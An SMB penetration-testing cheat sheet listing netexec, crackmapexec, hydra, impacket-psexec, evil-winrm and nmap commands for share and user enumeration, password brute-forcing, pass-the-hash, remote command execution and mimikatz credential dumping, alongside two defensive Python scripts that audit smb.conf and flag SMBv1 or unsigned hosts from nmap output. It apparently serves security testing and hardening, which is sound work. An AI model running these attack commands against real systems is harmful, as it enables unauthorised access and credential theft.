Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information. We do not encourage any kind of illegal or harmful activity.
## Introduction

Server Message Block (SMB) is a network file sharing protocol that provides access to shared files and printers on a local network. Older versions of the protocol (SMBv1 in particular) have been hit by major exploits such as EternalBlue.
| Category | Information Gained |
|---|---|
| Users and groups / shares | List of users and groups, details of shared resources |
| Operating system information | OS version, system configuration, installed updates |
| Password policies / password hashes | Password strength requirements, password expiration settings, hashed passwords |
| Privileges / permissions | User and group permissions, administrative rights |
| Available shares | Network shares, access permissions, shared directories |
## Listing SMB Shares

| Command | Description |
|---|---|
| `netexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --shares` | List shares using the specified username and password |
| `netexec smb [IP-ADDRESS] -u guest -p '' --shares` | List shares using guest access with no password |
| `smbclient -N -L //[IP-ADDRESS]` | List shares using a null session (no credentials) |
| `crackmapexec smb [IP-ADDRESS] -u '' -p '' --shares` | List shares using a null session (no credentials) |
### Tips & Tricks

If the Admin$ SMB share has read and write permissions, you can run psexec to establish a connection to the target Windows machine.
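The null-session and guest listings above only work when the server is configured to allow them. The following audit script is an added example (not part of this cheat sheet) that reads a Samba `smb.conf` and flags the parameters behind that behaviour: `restrict anonymous`, `map to guest`, `null passwords`, `guest ok`, an SMB1 `server min protocol`, and disabled signing. Both configurations in it are constructed, and where a parameter is absent the documented Samba default is assumed.

```python
"""Audit a Samba smb.conf for settings that let anonymous/guest clients
enumerate and read shares. Added example; configs below are constructed."""
import configparser

# Constructed permissive configuration, typical of a lab or legacy file server.
WEAK_SMB_CONF = """
[global]
workgroup = WORKGROUP
server min protocol = NT1
map to guest = Bad User
restrict anonymous = 0
server signing = disabled
null passwords = yes

[public]
path = /srv/public
guest ok = yes
writable = yes

[backups]
path = /srv/backups
valid users = @backup
"""

# Constructed hardened counterpart: no SMB1, no guest mapping, signing required.
HARDENED_SMB_CONF = """
[global]
workgroup = WORKGROUP
server min protocol = SMB2_02
map to guest = Never
restrict anonymous = 2
server signing = mandatory

[backups]
path = /srv/backups
valid users = @backup
"""

SMB1_DIALECTS = {"nt1", "lanman1", "lanman2", "core", "coreplus"}


def parse_smb_conf(text):
    # smb.conf is INI-like; configparser lowercases parameter names for us.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def setting(section, key, default):
    """Read a parameter, falling back to the (assumed) Samba default."""
    return section.get(key, default).strip().lower()


def audit_smb_conf(text):
    """Return (scope, parameter, reason) tuples for settings that widen access."""
    cp = parse_smb_conf(text)
    findings = []
    glob = cp["global"] if cp.has_section("global") else {}
    # (parameter, documented default, weak-value predicate, reason)
    checks = [
        ("restrict anonymous", "0", lambda v: v == "0", "null sessions can list shares and users"),
        ("map to guest", "never", lambda v: v != "never", "failed logons are mapped to the guest account"),
        ("null passwords", "no", lambda v: v == "yes", "accounts with empty passwords may log on"),
        ("server min protocol", "smb2_02", lambda v: v in SMB1_DIALECTS, "SMB1 dialects are still negotiated"),
        ("server signing", "default", lambda v: v == "disabled", "unsigned sessions can be relayed or tampered with"),
    ]
    for key, default, is_weak, reason in checks:
        if is_weak(setting(glob, key, default)):
            findings.append(("global", key, reason))
    # Per-share: any share that accepts guests, and whether guests can write to it.
    for name in cp.sections():
        if name == "global":
            continue
        share = cp[name]
        if setting(share, "guest ok", "no") == "yes":
            writable = (setting(share, "writable", setting(share, "writeable", "no")) == "yes"
                        or setting(share, "read only", "yes") == "no")
            findings.append((name, "guest ok",
                             "guest-writable share" if writable else "guest-readable share"))
    return findings


if __name__ == "__main__":
    for scope, key, reason in audit_smb_conf(WEAK_SMB_CONF):
        print(f"[{scope}] {key}: {reason}")
```

Running it against the weak configuration lists every global parameter plus the guest-writable `public` share; the hardened configuration produces no findings, which is the state a listing with `-N` or `-u '' -p ''` should fail against.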
## Enumerating SMB Files

| Command | Description |
|---|---|
| `netexec smb [IP-ADDRESS] -u [USERNAME] -p [PASSWORD] -M spider_plus` | Enumerates all files in the accessible shares using netexec with the spider_plus module. |
| `crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p [PASSWORD] -M spider_plus --shares 'Specific Share'` then `cat /tmp/cme_spider_plus/[IP-ADDRESS].json \| jq '. \| map_values(keys)'` | Enumerates all files in a specific share using CrackMapExec with the spider_plus module, then prints the file list per share from the JSON output. |
| `smbclient //[IP-ADDRESS]/[SHARE] -N` | Connects to an SMB share using null authentication. |
| `smbclient //[IP-ADDRESS]/[SHARE] -U [USERNAME] [PASSWORD]` | Connects to an SMB share with the specified username and password. |
| `smbclient.py '[DOMAIN]/[USERNAME]:[PASSWORD]@[IP/HOST]' -k -no-pass` | Connects to an SMB share using Kerberos authentication (ticket taken from the credential cache). |
### Tips & Tricks

If the IPC$ share is accessible, it enables us to brute-force RIDs (usernames).
## Smbclient Commands to Download All Files

| Command | Description |
|---|---|
| `smbclient //[IP-ADDRESS]/[SHARE] -U [USERNAME]` | Connect to the SMB share at the specified IP and share name. |
| `mask ""` | Clear any existing file mask so that all files match. |
| `recurse` | Enable recursive mode to include subdirectories. |
| `prompt` | Toggle prompting off so `mget` does not ask for confirmation for each file. |
| `mget *` | Download all files and directories from the share into the current directory. |
## User Enumeration

| Description | Command |
|---|---|
| Enumerate users | `crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --users` |
| Perform RID brute-force to get users | `crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --rid-brute` |
| Enumerate domain groups | `crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --groups` |
| Enumerate local users | `crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --local-users` |
## Brute-Forcing SMB Credentials

| Scenario | Command |
|---|---|
| Unknown user | `hydra -L user.txt -p "Password" -f [TARGET-IP] smb` |
| Unknown password | `hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] smb` |
| Unknown user and password | `hydra -L user.txt -P /opt/rockyou.txt -f [TARGET-IP] smb` |
| With domain | `hydra -l user -P /opt/rockyou.txt -f -m Domain [TARGET-IP] smb` |
## Pass the Hash Techniques

| Technique | Command |
|---|---|
| CrackMapExec | `crackmapexec smb [TARGET-IP] -u '[USERNAME]' -d '[DOMAIN]' -H ':[NTLM-HASH]' --shares` |
| psexec (impacket) | `impacket-psexec -hashes ":[NTLM-HASH]" [DOMAIN].local/[USERNAME]@[TARGET-IP]` |
| evil-winrm | `evil-winrm -i [TARGET-IP] -u [USERNAME] -H [NTLM-HASH]` |
## CrackMapExec Commands

| Command | Description |
|---|---|
| `crackmapexec smb -L` | Lists the modules available for the SMB protocol (spider_plus, mimikatz, etc.). |
| `crackmapexec smb [TARGET-IP] -u [USERNAME] -H [NTLM-HASH] --local-auth` | Authenticates against the local SAM (rather than the domain) with an NTLM hash. |
| `crackmapexec smb --gen-relay-list smb-targets.txt [IP-ADDRESS/RANGE]` | Writes the hosts in the range that do not require SMB signing to smb-targets.txt. |
| `crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'net group "Domain Admins" /domain'` | Executes a Windows command over SMB, here listing the Domain Admins group. |
| `crackmapexec smb [IP-ADDRESS/RANGE] -u '[USERNAME]' -p '[PASSWORD]' --local-auth -M mimikatz` | Runs the Mimikatz module to extract credentials from the SMB targets in the specified subnet. |
| `crackmapexec smb [TARGET-IP] -u '[USERNAME]' -p '[PASSWORD]' --pass-pol` | Extracts the password policy. |
## Nmap Enumeration Commands

| Nmap Script | Description |
|---|---|
| `nmap --script smb-* -p 139,445 [TARGET-IP]` | Executes all SMB-related Nmap scripts against the specified IP address for a broad assessment. |
| `nmap --script smb-enum-* -p 139,445 [TARGET-IP]` | Executes all SMB enumeration scripts for detailed information on shares, users, sessions, etc. |
| `nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [TARGET-IP]` | Enumerates shares and user accounts on the target SMB server using specific NSE scripts. |
## List of Nmap SMB Scripts

| Script Name | Explanation |
|---|---|
| smb-brute.nse | Performs brute-force password auditing against SMB servers. |
| smb-enum-domains.nse | Enumerates domains on an SMB server. |
| smb-enum-groups.nse | Enumerates groups on an SMB server. |
| smb-enum-processes.nse | Lists all processes on an SMB server. |
| smb-enum-services.nse | Lists all services on an SMB server. |
| smb-enum-sessions.nse | Enumerates active sessions on an SMB server. |
| smb-enum-shares.nse | Enumerates shared folders on an SMB server. |
| smb-enum-users.nse | Enumerates users on an SMB server. |
| smb-flood.nse | Performs a DoS (Denial of Service) against SMB by flooding it with bogus data. |
| smb-ls.nse | Lists files and directories on an SMB share. |
| smb-mbenum.nse | Enumerates Windows systems in the workgroup or domain using the browser service. |
| smb-os-discovery.nse | Attempts to discover the operating system version and build number over SMB. |
| smb-print-text.nse | Prints a text file on a remote shared printer. |
| smb-protocols.nse | Lists the SMB protocol versions (SMB1, SMB2, SMB3) supported by the target server. |
| smb-psexec.nse | Executes commands on a remote system using SMB and PsExec. |
| smb-security-mode.nse | Checks the security mode (e.g. authentication level, message signing) of the SMB server. |
| smb-server-stats.nse | Retrieves server statistics, such as bytes transferred and file counts. |
| smb-system-info.nse | Gathers system information from the SMB server, including OS details, domain, and system uptime. |
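Two of the scripts in this list, smb-protocols and smb-security-mode, answer the questions a defender cares about most after a scan of their own estate: does a host still speak SMBv1 (the dialect EternalBlue abused), and does it enforce message signing? The parser below is an added example, not part of this cheat sheet or of Nmap, that reads `nmap -oX` output for those two scripts and produces a per-host hardening worklist. The XML is a constructed sample that mirrors the `<hostscript>/<script>/<table>/<elem>` layout Nmap emits for these scripts (the `output` attribute Nmap also writes is omitted); it assumes the dialect strings and `message_signing` values those scripts print.

```python
"""Build a hardening worklist from nmap -oX output for smb-protocols and
smb-security-mode. Added example; the XML below is a constructed sample."""
import xml.etree.ElementTree as ET

# Constructed sample: one legacy host (SMBv1 on, signing off) and one hardened host.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
<host><status state="up"/><address addr="10.0.0.20" addrtype="ipv4"/>
<hostscript>
<script id="smb-protocols"><table key="dialects">
<elem>NT LM 0.12 (SMBv1) [dangerous, but default]</elem>
<elem>2.0.2</elem><elem>2.1</elem><elem>3.0</elem>
</table></script>
<script id="smb-security-mode">
<elem key="account_used">guest</elem>
<elem key="authentication_level">user</elem>
<elem key="challenge_response">supported</elem>
<elem key="message_signing">disabled (dangerous, but default)</elem>
</script>
</hostscript></host>
<host><status state="up"/><address addr="10.0.0.21" addrtype="ipv4"/>
<hostscript>
<script id="smb-protocols"><table key="dialects">
<elem>2.0.2</elem><elem>2.1</elem><elem>3.1.1</elem>
</table></script>
<script id="smb-security-mode">
<elem key="account_used">guest</elem>
<elem key="authentication_level">user</elem>
<elem key="challenge_response">supported</elem>
<elem key="message_signing">required</elem>
</script>
</hostscript></host>
</nmaprun>
"""


def assess_smb_hosts(xml_text):
    """Return one record per host: dialects, SMBv1 flag, signing mode and findings."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        rec = {"addr": addr_el.get("addr") if addr_el is not None else "?",
               "dialects": [], "smbv1": False, "signing": "unknown", "findings": []}
        for script in host.iter("script"):
            sid = script.get("id")
            if sid == "smb-protocols":
                # smb-protocols lists each negotiated dialect as one <elem>
                rec["dialects"] = [e.text.strip() for e in script.iter("elem") if e.text]
                rec["smbv1"] = any("SMBv1" in d or d.startswith("NT LM") for d in rec["dialects"])
            elif sid == "smb-security-mode":
                # smb-security-mode emits key/value elems; keep the first word of
                # message_signing ("disabled", "supported" or "required")
                mode = {e.get("key"): (e.text or "") for e in script.iter("elem")}
                rec["signing"] = mode.get("message_signing", "unknown").split()[0]
        if rec["smbv1"]:
            rec["findings"].append("SMBv1 enabled: disable it (EternalBlue-class bugs target this dialect)")
        if rec["signing"] == "disabled":
            rec["findings"].append("SMB signing disabled: NTLM relay possible, require signing")
        elif rec["signing"] == "supported":
            rec["findings"].append("SMB signing optional: non-signing clients remain relayable")
        results.append(rec)
    return results


if __name__ == "__main__":
    for rec in assess_smb_hosts(SAMPLE_NMAP_XML):
        status = "; ".join(rec["findings"]) or "OK"
        print(f"{rec['addr']}: dialects={rec['dialects']} signing={rec['signing']} -> {status}")
```

For the sample, 10.0.0.20 comes back with two findings (SMBv1 enabled, signing disabled) and 10.0.0.21 with none. Pointing the function at a real `-oX` file from `nmap --script smb-protocols,smb-security-mode -p 445` gives the same worklist for an entire range.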